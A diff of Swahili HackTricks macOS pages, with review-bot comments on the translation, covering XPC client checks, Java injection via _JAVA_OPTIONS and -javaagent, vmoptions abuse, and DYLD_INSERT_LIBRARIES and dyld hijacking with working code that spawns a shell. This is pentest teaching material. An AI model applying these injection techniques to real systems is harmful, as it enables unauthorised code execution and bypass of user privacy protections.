* Ikiwa hii **haitathibitishwa**, wateja wazee na dhaifu, walio hatarini kwa kuingiza mchakato, wanaweza kutumika kuunganisha na huduma ya XPC hata na uthibitisho mwingine uliopo.
5. (4 au 5) Angalia ikiwa mchakato unaounganisha una **runtime imara bila ruhusa hatari** (kama zile zinazoruhusu kupakia maktaba za aina yoyote au kutumia mazingira ya DYLD)
1. Ikiwa hii **haitathibitishwa**, mteja anaweza kuwa **hatarini kwa kuingiza nambari**
6. Angalia ikiwa mchakato unaounganisha una **ruhusa** inayoruhusu kuunganisha na huduma. Hii inatumika kwa programu za Apple.
7. **Uthibitisho** lazima uwe **kulingana** na **kitambulisho cha ukaguzi cha mteja kinachounganisha** badala ya Kitambulisho cha Mchakato (**PID**) kwani cha kwanza kinazuia mashambulizi ya kutumia tena PID.
* Watengenezaji **mara chache hutumia wito wa API ya kitambulisho cha ukaguzi** kwani ni **binafsi**, kwa hivyo Apple inaweza **kubadilisha** wakati wowote. Kwa kuongezea, matumizi ya API binafsi hayaruhusiwi katika programu za Duka la App la Mac.
* Ikiwa njia ya **`processIdentifier`** inatumika, inaweza kuwa hatarini
* Badala ya **`xpc_connection_get_audit_token`**, inapaswa kutumika **`xpc_dictionary_get_audit_token`**, kwani ya mwisho inaweza pia kuwa [hatarini katika hali fulani](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/).
* Ikiwa hii **haijathibitishwa**, wateja wa zamani, wasio salama, walio hatarini kwa sindano ya mchakato wanaweza kutumika kuungana na huduma ya XPC hata na ukaguzi mwingine ukiwa mahali.
5. (4 au 5) Angalia ikiwa mchakato unaounganisha una mazingira ya runtime yaliyohakikishwa bila ruhusa hatari (kama zile zinazoruhusu kupakia maktaba za kawaida au kutumia DYLD env vars)
1. Ikiwa hii **haijathibitishwa**, mteja anaweza kuwa **hatari kwa sindano ya msimbo**
6. Angalia ikiwa mchakato unaounganisha una **ruhusa** inayoruhusu kuungana na huduma. Hii inatumika kwa binaries za Apple.
7. **Uthibitisho** lazima uwe **kulingana** na **tokeni ya ukaguzi ya mteja** **badala** ya kitambulisho chake cha mchakato (**PID**) kwani ya kwanza inazuia **shambulio la upya la PID**.
* Wandevu **hawatumii mara kwa mara tokeni ya ukaguzi** API wito kwani ni **binafsi**, hivyo Apple inaweza **kubadilisha** wakati wowote. Zaidi ya hayo, matumizi ya API binafsi hayaruhusiwi katika programu za Duka la Mac.
* Ikiwa njia **`processIdentifier`** inatumika, inaweza kuwa hatari
* **`xpc_dictionary_get_audit_token`** inapaswa kutumika badala ya **`xpc_connection_get_audit_token`**, kwani ya mwisho inaweza pia kuwa [hatari katika hali fulani](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/).
### Mashambulizi ya Mawasiliano
### Communication Attacks
Kwa habari zaidi kuhusu shambulio la kutumia tena PID angalia:
Kwa maelezo zaidi kuhusu shambulio la upya la PID angalia:
{% content-ref url="macos-pid-reuse.md" %}
[macos-pid-reuse.md](macos-pid-reuse.md)
{% endcontent-ref %}
Kwa habari zaidi kuhusu shambulio la **`xpc_connection_get_audit_token`** angalia:
Kwa maelezo zaidi **`xpc_connection_get_audit_token`** shambulio angalia:
{% content-ref url="macos-xpc_connection_get_audit_token-attack.md" %}
[macos-xpc\_connection\_get\_audit\_token-attack.md](macos-xpc\_connection\_get\_audit\_token-attack.md)
{% endcontent-ref %}
### Kuzuia Mashambulizi ya Kupunguza - Trustcache
### Trustcache - Downgrade Attacks Prevention
Trustcache ni njia ya ulinzi iliyoletwa kwenye mashine za Apple Silicon ambayo inahifadhi kwenye hifadhidata CDHSAH ya programu za Apple ili tu programu zisizobadilishwa zinazoruhusiwa ziweze kutekelezwa. Hii inazuia utekelezaji wa toleo za kupunguza.
Trustcache ni njia ya kujihami iliyowekwa katika mashine za Apple Silicon ambayo inahifadhi hifadhidata ya CDHSAH ya binaries za Apple ili tu binaries zisizobadilishwa zinazoruhusiwa ziweze kutekelezwa. Hii inazuia utekelezaji wa toleo la kudharau.
### Mifano ya Nambari
### Code Examples
Seva itatekeleza uthibitisho huu katika kazi inayoitwa **`shouldAcceptNewConnection`**.
Seva itatekeleza **uthibitisho** huu katika kazi inayoitwa **`shouldAcceptNewConnection`**.
{% code overflow="wrap" %}
```objectivec
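Review bot: the code-signing checks are mistranslated in a way that changes their meaning. `umeandikwa na cheti` says the connecting process is "written with" a certificate; the old `umesainiwa na cheti` (signed with) is correct, in both check 1 and check 2. `cheti chochote cha mende` turns "any dev certificate" into "any bug certificate" (mende = bug, cockroach); use `cheti chochote cha maendeleo` or keep "developer" as a loanword. `Wandevu` is not a Swahili word; the old `Watengenezaji` was right. The bold on the hardened-runtime check is also dropped (`**runtime imara bila ruhusa hatari**` becomes plain text), breaking the emphasis pattern of the list. On the positive side, the reordered last bullet now makes `ya mwisho` refer to `xpc_connection_get_audit_token`, which matches the linked attack page, whereas the old wording pointed the caveat at `xpc_dictionary_get_audit_token` by mistake; keep that change.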
@ -65,9 +66,9 @@ return YES;
```
{% endcode %}
Kitu NSXPCConnection ina mali ya **binafsi** **`auditToken`** (ile inayopaswa kutumika lakini inaweza kubadilika) na mali ya **umma** **`processIdentifier`** (ile ambayo haipaswi kutumika).
Kitu NSXPCConnection kina mali **ya faragha** **`auditToken`** (ile ambayo inapaswa kutumika lakini inaweza kubadilika) na mali **ya umma** **`processIdentifier`** (ile ambayo haipaswi kutumika).
Mchakato wa kuunganisha unaweza kuthibitishwa kwa kitu kama hiki:
Mchakato unaounganisha unaweza kuthibitishwa kwa kitu kama:
{% code overflow="wrap" %}
```objectivec
@ -91,7 +92,7 @@ SecTaskValidateForRequirement(taskRef, (__bridge CFStringRef)(requirementString)
```
{% endcode %}
Ikiwa msanidi programu hataki kuangalia toleo la mteja, anaweza angalia kuwa mteja hana udhaifu wa kuingiza mchakato angalau:
Ikiwa mendelevu hataki kuangalia toleo la mteja, anaweza kuangalia kwamba mteja si hatarini kwa sindano ya mchakato angalau:
{% code overflow="wrap" %}
```objectivec
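Review bot: `mendelevu` is not a Swahili word; the old `msanidi programu` (developer) should be kept. `sindano ya mchakato` (literally "needle of a process") for process injection is a calque used here and in the checklist above, while the rest of the page renders injection as `uingizaji`/`kuingiza`; pick one term and use it throughout.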
@ -110,16 +111,17 @@ return Yes; // Accept connection
```
{% endcode %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}


@ -1,22 +1,23 @@
# Uingizaji wa Programu za Java kwenye macOS
# macOS Java Applications Injection
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Uchunguzi
## Enumeration
Tafuta programu za Java zilizosakinishwa kwenye mfumo wako. Ili kugundua programu za Java katika **Info.plist**, unaweza kutafuta vigezo vya java ambavyo vinajumuisha herufi **`java.`**, hivyo unaweza kutafuta kwa kutumia hilo:
Pata programu za Java zilizowekwa kwenye mfumo wako. Iligundulika kuwa programu za Java katika **Info.plist** zitakuwa na baadhi ya vigezo vya java ambavyo vina nyuzi **`java.`**, hivyo unaweza kutafuta hilo:
```bash
# Search only in /Applications folder
sudo find /Applications -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
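Review bot: `## Enumeration` replaces the Swahili `## Uchunguzi` while the body remains Swahili, the same heading-language inconsistency as in the other files of this commit. In the sentence itself, `vina nyuzi **`java.`**` uses `nyuzi` in the sense of "string", but this page already uses `nyuzi` for "thread" (`nyuzi ya mbali`, remote thread); the old `herufi` avoids the collision.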
@ -26,13 +27,13 @@ sudo find / -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
```
## \_JAVA\_OPTIONS
Variable ya mazingira **`_JAVA_OPTIONS`** inaweza kutumika kuwezesha vigezo vya Java visivyo na kikomo katika utekelezaji wa programu iliyoundwa kwa kutumia Java:
Kigezo cha mazingira **`_JAVA_OPTIONS`** kinaweza kutumika kuingiza vigezo vya java vya kiholela katika utekelezaji wa programu iliyotengenezwa kwa java:
```bash
# Write your payload in a script called /tmp/payload.sh
export _JAVA_OPTIONS='-Xms2m -Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
```
Ili kuendesha kama mchakato mpya na sio kama mtoto wa terminal ya sasa, unaweza kutumia:
Ili kuitekeleza kama mchakato mpya na si kama mtoto wa terminal ya sasa unaweza kutumia:
```objectivec
#import <Foundation/Foundation.h>
// clang -fobjc-arc -framework Foundation invoker.m -o invoker
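Review bot: `vigezo vya java vya kiholela` is the correct rendering of "arbitrary Java params" and improves on the old `visivyo na kikomo`; this is also the term the first file of this commit should use instead of `zisizo na mipaka`, so the vocabulary is consistent across files.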
@ -85,7 +86,7 @@ NSMutableDictionary *environment = [NSMutableDictionary dictionaryWithDictionary
return 0;
}
```
Hata hivyo, hii itasababisha kosa kwenye programu inayotekelezwa, njia nyingine ya siri zaidi ni kuunda wakala wa Java na kutumia:
Hata hivyo, hiyo itasababisha kosa kwenye programu iliyotekelezwa, njia nyingine ya siri zaidi ni kuunda wakala wa java na kutumia:
```bash
export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
@ -95,10 +96,10 @@ export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'
open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
```
{% hint style="danger" %}
Kuunda wakala na **toleo tofauti la Java** kutoka kwa programu inaweza kusababisha kushindwa kwa utekelezaji wa wakala na programu
Kuunda wakala kwa **toleo tofauti la Java** kutoka kwa programu kunaweza kusababisha kuanguka kwa utekelezaji wa wakala na programu zote mbili
{% endhint %}
Ambapo wakala anaweza kuwa:
Mahali ambapo wakala anaweza kuwa:
{% code title="Agent.java" %}
```java
@ -119,7 +120,7 @@ err.printStackTrace();
```
{% endcode %}
Ili kutekeleza wakala, endesha:
Ili kukusanya wakala, endesha:
```bash
javac Agent.java # Create Agent.class
jar cvfm Agent.jar manifest.txt Agent.class # Create Agent.jar
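Review bot: `Ili kukusanya wakala` for "to compile the agent" reads as "to gather the agent"; the old `kutekeleza` (execute) was also wrong, since the commands shown (`javac`, `jar`, with the comments `Create Agent.class` and `Create Agent.jar`) build the agent rather than run it. `Ili kuunda wakala` (to build the agent) fits the commands.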
@ -131,7 +132,7 @@ Agent-Class: Agent
Can-Redefine-Classes: true
Can-Retransform-Classes: true
```
Na kisha weka mazingira ya kipekee na endesha programu ya Java kama ifuatavyo:
Na kisha peleka variable ya env na uendeshe programu ya java kama:
```bash
export _JAVA_OPTIONS='-javaagent:/tmp/j/Agent.jar'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
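Review bot: L636 renders `export` as "peleka variable ya env" ("send the env variable"), which does not describe what L638 does; L635's "weka" ("set") is the accurate verb, and "java" should again be "Java" as at L617.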
@ -140,14 +141,14 @@ export _JAVA_OPTIONS='-javaagent:/tmp/j/Agent.jar'
open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
```
## Faili la vmoptions
## vmoptions file
Faili hili linasaidia ufafanuzi wa **params za Java** wakati Java inatekelezwa. Unaweza kutumia mbinu zilizotangulia kubadilisha params za java na **kufanya mchakato utekeleze amri za kiholela**.\
Zaidi ya hayo, faili hili pia linaweza **kuhusisha faili zingine** na kwa kutumia `include` directory, hivyo unaweza pia kubadilisha faili iliyohusishwa.
Faili hili linaunga mkono uainishaji wa **Java params** wakati Java inatekelezwa. Unaweza kutumia baadhi ya hila za awali kubadilisha java params na **kufanya mchakato utekeleze amri zisizo za kawaida**.\
Zaidi ya hayo, faili hili linaweza pia **kujumuisha wengine** kwa kutumia saraka ya `include`, hivyo unaweza pia kubadilisha faili iliyojumuishwa.
Zaidi ya hayo, baadhi ya programu za Java zitapakia **zaidi ya faili moja ya `vmoptions`**.
Zaidi ya hayo, baadhi ya programu za Java zitakuwa **zinaweza kupakia zaidi ya faili moja ya `vmoptions`**.
Baadhi ya programu kama Android Studio inaonyesha katika **matokeo yake wapi wanatafuta** faili hizi, kama:
Baadhi ya programu kama Android Studio zinaonyesha katika **matokeo yao wanatazamia** faili hizi, kama:
```bash
/Applications/Android\ Studio.app/Contents/MacOS/studio 2>&1 | grep vmoptions
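Review bot: L647 weakens "amri za kiholela" ("arbitrary commands", L645) into "amri zisizo za kawaida" ("unusual commands"), and L652 drops "wapi" ("where") from L651, so the sentence no longer says that apps such as Android Studio print where they look for the `vmoptions` files, which is exactly what the `grep vmoptions` command at L654 is there to show. Suggest restoring "amri za kiholela" and "wapi wanatafuta".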
@ -158,7 +159,7 @@ Baadhi ya programu kama Android Studio inaonyesha katika **matokeo yake wapi wan
2023-12-13 19:53:23.922 studio[74913:581359] parseVMOptions: /Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
2023-12-13 19:53:23.923 studio[74913:581359] parseVMOptions: platform=20 user=1 file=/Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
```
Ikiwa hawana, unaweza kuchunguza kwa urahisi kwa kutumia:
Ikiwa hawafanyi hivyo, unaweza kuangalia kwa urahisi kwa:
```bash
# Monitor
sudo eslogger lookup | grep vmoption # Give FDA to the Terminal
@ -166,18 +167,19 @@ sudo eslogger lookup | grep vmoption # Give FDA to the Terminal
# Launch the Java app
/Applications/Android\ Studio.app/Contents/MacOS/studio
```
Tazama jinsi ilivyo ya kuvutia kwamba Android Studio katika mfano huu inajaribu kupakia faili **`/Applications/Android Studio.app.vmoptions`**, mahali ambapo mtumiaji yeyote kutoka kwenye kikundi cha **`admin` ana ufikiaji wa kuandika.**
Note how interesting is that Android Studio in this example is trying to load the file **`/Applications/Android Studio.app.vmoptions`**, a place where any user from the **`admin` group has write access.**
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
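Review bot: L669 replaces the Swahili sentence at L668 with untranslated English, and L671-L672 and L682-L684 are English as well, so this Swahili page now ends mixed-language. L668 was a faithful translation of the same sentence and could simply be kept.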

View file

@ -1,22 +1,23 @@
# macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES
# macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## DYLD_INSERT_LIBRARIES Mfano wa Msingi
## DYLD\_INSERT\_LIBRARIES Mfano wa msingi
**Mfano wa msingi wa** maktaba ya kuingiza **kutekeleza kifaa cha shell:**
**Maktaba ya kuingiza** ili kutekeleza shell:
```c
// gcc -dynamiclib -o inject.dylib inject.c
@ -34,7 +35,7 @@ execv("/bin/bash", 0);
//system("cp -r ~/Library/Messages/ /tmp/Messages/");
}
```
Binaryi la kushambulia:
Binary ya kushambulia:
```c
// gcc hello.c -o hello
#include <stdio.h>
@ -45,13 +46,13 @@ printf("Hello, World!\n");
return 0;
}
```
Uingizaji:
Uwekaji:
```bash
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
```
## Mfano wa Udukuzi wa Dyld Hijacking
## Mfano wa Dyld Hijacking
Binary iliyolengwa na udhaifu ni `/Applications/VulnDyld.app/Contents/Resources/lib/binary`.
Binary iliyoathirika ni `/Applications/VulnDyld.app/Contents/Resources/lib/binary`.
{% tabs %}
{% tab title="entitlements" %}
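Review bot: L730 "Uwekaji" ("placement") loses the "injection" sense that L729's "Uingizaji" carried for the `DYLD_INSERT_LIBRARIES=inject.dylib ./hello` step at L732; the page titles at L820/L821 still use "Uingizaji" for injection, so keep that term here.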
@ -91,7 +92,7 @@ compatibility version 1.0.0
{% endtab %}
{% endtabs %}
Kutokana na taarifa tulizopata hapo awali tunajua kwamba **haikagua saini ya maktaba zilizopakiwa** na **inajaribu kupakia maktaba kutoka**:
Kwa taarifa za awali tunajua kwamba **haichunguzi saini ya maktaba zilizopakiwa** na **inajaribu kupakia maktaba kutoka**:
* `/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib`
* `/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib`
@ -104,7 +105,7 @@ pwd
find ./ -name lib.dylib
./Contents/Resources/lib2/lib.dylib
```
Kwa hivyo, ni rahisi kuiteka! Unda maktaba ambayo **inatekeleza nambari isiyo ya kawaida na kuuza nje kazi sawa** kama maktaba halali kwa kuiuza nje. Na kumbuka kuichakata na toleo lililotarajiwa:
Hivyo, inawezekana kuiteka! Unda maktaba ambayo **inasimamia baadhi ya msimbo wa kiholela na inatoa kazi sawa** kama maktaba halali kwa kuirejesha. Na kumbuka kuikamilisha na toleo zinazotarajiwa:
{% code title="lib.m" %}
```objectivec
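Review bot: L752 turns "inatekeleza nambari isiyo ya kawaida" (L751, "executes arbitrary code") into "inasimamia baadhi ya msimbo wa kiholela" ("manages some arbitrary code"), and "kuirejesha" ("returning it") does not convey the reexport that L765/L766 and the `otool -l ... grep REEXPORT` check at L770 are about. Suggest "inatekeleza msimbo wa kiholela" and keeping "reexport" as in L766.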
@ -117,7 +118,7 @@ NSLog(@"[+] dylib hijacked in %s", argv[0]);
```
{% endcode %}
Kuikusanya:
Ili kuikamilisha:
{% code overflow="wrap" %}
```bash
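Review bot: L759 "Ili kuikamilisha" means "to complete it", not "to compile it", yet the block that follows is the `gcc -dynamiclib ...` compile line visible at L762; L758's "Kuikusanya" was right and matches "kukusanya" used for `javac` at L627. The same "kuikamilisha" slip appears at the end of L752.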
@ -126,7 +127,9 @@ gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Found
```
{% endcode %}
Njia ya reexport iliyoundwa kwenye maktaba ni ya kulinganisha na mzigo, tugeuze iwe njia kamili kwa maktaba ya kuuza:
Njia ya reexport iliyoundwa katika maktaba ni ya kuhusiana na loader, hebu tuibadilishe kuwa njia kamili ya maktaba ya kusafirisha:
{% code overflow="wrap" %}
```bash
#Check relative
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
@ -145,7 +148,7 @@ name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Con
```
{% endcode %}
Hatimaye tu nakili kwenye **eneo lililoporwa**:
Hatimaye nakala tu kwenye **mahali palipoharibiwa**:
{% code overflow="wrap" %}
```bash
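Review bot: L775 "mahali palipoharibiwa" ("damaged place") misrenders the hijacked location that L774 called "eneo lililoporwa"; the `cp lib.dylib ".../lib/lib.dylib"` at L778 copies into the first search path listed at L745, so "hijacked" is the meaning to keep.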
@ -153,33 +156,34 @@ cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib"
```
{% endcode %}
Na **tekeleza** binary na angalia ikiwa **maktaba imepakia**:
Na **tekeleza** binary na uangalie **maktaba ilipakiwa**:
<pre class="language-context"><code class="lang-context">"/Applications/VulnDyld.app/Contents/Resources/lib/binary"
<strong>2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib imehijacked katika /Applications/VulnDyld.app/Contents/Resources/lib/binary
<strong>2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
</strong>Matumizi: [...]
</code></pre>
{% hint style="info" %}
Maelezo mazuri kuhusu jinsi ya kutumia udhaifu huu kudanganya ruhusa za kamera za telegram zinaweza kupatikana kwenye [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/)
Andiko zuri kuhusu jinsi ya kutumia udhaifu huu kuharibu ruhusa za kamera za telegram linaweza kupatikana katika [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/)
{% endhint %}
## Kiwango Kubwa
## Kiwango Kikubwa
Ikiwa unapanga kujaribu kuingiza maktaba kwenye binaries ambazo hazikutazamiwa, unaweza kuangalia ujumbe wa matukio ili kujua lini maktaba inapakia ndani ya mchakato (katika kesi hii ondoa printf na utekelezaji wa `/bin/bash`).
Ikiwa unapanga kujaribu kuingiza maktaba katika binaries zisizotarajiwa unaweza kuangalia ujumbe wa matukio ili kujua wakati maktaba inapopakuliwa ndani ya mchakato (katika kesi hii ondoa printf na utekelezaji wa `/bin/bash`).
```bash
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"'
```
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
